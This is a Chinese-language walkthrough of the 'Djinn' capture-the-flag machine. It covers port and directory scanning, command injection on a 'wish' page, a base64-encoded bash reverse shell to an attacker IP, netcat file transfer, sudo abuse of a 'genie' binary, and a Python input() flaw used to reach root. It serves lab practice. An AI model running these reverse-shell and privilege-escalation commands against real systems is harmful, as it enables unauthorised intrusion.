Skip to content

Djinn

简述

对网站目录进行爆破。发现页面存在代码执行,利用之后拿取一个低级的权限,提权通过其他的用户执行相关的命令进行提权。最后存在一个python的input漏洞利用漏洞进行提权

发现

对端口进行扫描以后记得要全面
nmap -p 1-65535 -sS ip
发现开启了一个7331 端口,其中存在一个页面

直接使用gobuster对页面进行寻找子目录

 gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.1.59:7331

得到页面之后发现wish页面存在注入
注入经过base64的命令

bash -i >& /dev/tcp/192.168.43.39/1234 0>&1  | base64 -d| bash  
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzkvMTIzNCAwPiYx| base64 -d| bash  

之后反弹shell

提权

如何进行提权? 拿到shell第一步,获得一个交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'  

翻看其中的文件 在/home/nitish/.dev/拿到nitish的密码
登录之后输入 sudo -l 查看可以执行的命令
提示使用genie这个命令
翻看了man文档之后构造命令

sudo -u sam /usr/bin/genie -cmd 命令  
意思是使用sam这个角色登录执行/usr/bin/genie 这个命令 其中-cmd是genie的参数  

直接拿到了sam的权限
然后继续查看sudo -l 发现可以使用/root/lago
查看其中的文件 发现一个隐藏文件 /home/sam/.pyc 使用反编译
nc传输文件的方法 cat filename | nc ip port 发现就是lago文件的编译

对代码进行分析 存在input漏洞
https://blog.51cto.com/12332766/2299894 直接进行利用拿到root权限

总结

目录扫描哪家好 还是gobuster最巧妙
拿到普通shell之后第一件事是转换为交互式shell
要翻里面的文件 一般存在奸情
要看特殊的命令会有特殊的收货

Back to top